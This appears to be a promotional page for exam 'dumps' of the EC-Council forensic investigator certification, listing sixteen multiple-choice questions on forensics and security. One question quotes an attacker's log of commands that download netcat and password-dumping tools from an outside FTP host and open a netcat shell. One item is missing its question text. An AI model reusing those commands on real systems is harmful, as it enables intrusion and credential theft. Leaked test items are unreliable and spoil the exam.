for EC-Council certification, Real Success Guaranteed with Updated . 100% PASS 312-49v9 ECCouncil Computer Hacking Forensic Investigator (V9) exam Today!
Check 312-49v9 free dumps before getting the full version:
NEW QUESTION 1
What is the first step taken in an investigation for laboratory forensic staff members?
- A. Packaging the electronic evidence
- B. Securing and evaluating the electronic crime scene
- C. Conducting preliminary interviews
- D. Transporting the electronic evidence
NEW QUESTION 2
Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately. Which organization coordinates computer crimes investigations throughout the United States?
- A. Internet Fraud Complaint Center
- B. Local or national office of the U.
- C. Secret Service
- D. National Infrastructure Protection Center
- E. CERT Coordination Center
NEW QUESTION 3
Davidson Trucking is a small transportation company that has three local offices in Detroit Michigan. Ten female employees that work for the company have gone to an attorney reporting that male employees repeatedly harassed them and that management did nothing to stop the problem. Davidson has employee policies that outline all company guidelines, including awareness on harassment and how it will not be tolerated. When the case is brought to court, whom should the prosecuting attorney call upon for not upholding company policy?
- A. IT personnel
- B. Employees themselves
- C. Supervisors
- D. Administrative assistant in charge of writing policies
NEW QUESTION 4
Which of the following commands shows you the names of all open shared files on a server and number of file locks on each file?
- A. Net sessions
- B. Net file
- C. Netconfig
- D. Net share
NEW QUESTION 5
- A. a utility by AccessData
- B. a standard MS-DOS command
- C. Digital Intelligence utility
- D. dd copying tool
Explanation: diskcopy is a STANDARD DOS utility. C:\WINDOWS>diskcopy /? Copies the contents of one floppy disk to another.
NEW QUESTION 6
Graphics Interchange Format (GIF) is a ____ RGB bitmap Image format for Images with up to 256 distinct colors per frame.
- A. 8-bit
- B. 16-bit
- C. 24-bit
- D. 32-bit
NEW QUESTION 7
An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome.
- A. True
- B. False
NEW QUESTION 8
If an attacker's computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?
- A. 31402
- B. The zombie will not send a response
- C. 31401
- D. 31399
NEW QUESTION 9
Shortcuts are the files with the extension .Ink that are created and are accessed by the users. These files provide you with information about:
- A. Files or network shares
- B. Running application
- C. Application logs
- D. System logs
NEW QUESTION 10
Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM file on a computer. Where should Harold navigate on the computer to find the file?
- A. %systemroot%\LSA
- B. %systemroot%\system32\drivers\etc
- C. %systemroot%\repair
- D. %systemroot%\system32\LSA
NEW QUESTION 11
Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the directions from the ISP as well as the wireless router manual. He does not have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then the connection drops and the signal goes away. Eventually the wireless signal shows back up, but drops intermittently. What could be Tyler issue with his home wireless network?
- A. CB radio
- B. 2.4Ghz Cordless phones
- C. Satellite television
- D. Computers on his wired network
NEW QUESTION 12
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 188.8.131.52. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 184.108.40.206 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00
>>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
- A. It is a local exploit where the attacker logs in using username johna2k
- B. There are two attackers on the system – johna2k and haxedj00
- C. The attack is a remote exploit and the hacker downloads three files
- D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
Explanation: The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.
NEW QUESTION 13
What is considered a grant of a property right given to an individual who discovers or invents a new machine, process, useful composition of matter or manufacture?
- A. Copyright
- B. Design patent
- C. Trademark
- D. Utility patent
NEW QUESTION 14
When examining a hard disk without a write-blocker, you should not start windows because Windows will write data to the:
- A. Recycle Bin
- B. MSDOS.sys
- C. BIOS
- D. Case files
NEW QUESTION 15
Jason has set up a honeypot environment by creating a DMZ that has no physical or logical access to his production network. In this honeypot, he has placed a server running Windows Active Directory. He has also placed a Web server in the DMZ that services a number of web pages that offer visitors a chance to download sensitive information by clicking on a button. A week later, Jason finds in his network logs how an intruder accessed the honeypot and downloaded sensitive information. Jason uses the logs to try and prosecute the intruder for stealing sensitive corporate information. Why will this not be viable?
- A. Enticement
- B. Entrapment
- C. Intruding into ahoneypot is not illegal
- D. Intruding into a DMZ is not illegal
NEW QUESTION 16
Task list command displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer.
Which of the following task list commands provides information about the listed processes, including the image name, PID, name, and number of the session for the process?
- A. tasklist/s
- B. tasklist/u
- C. tasklist/p
- D. tasklist/V
P.S. Certifytools now are offering 100% pass ensure 312-49v9 dumps! All 312-49v9 exam questions have been updated with correct answers: https://www.certifytools.com/312-49v9-exam.html (486 New Questions)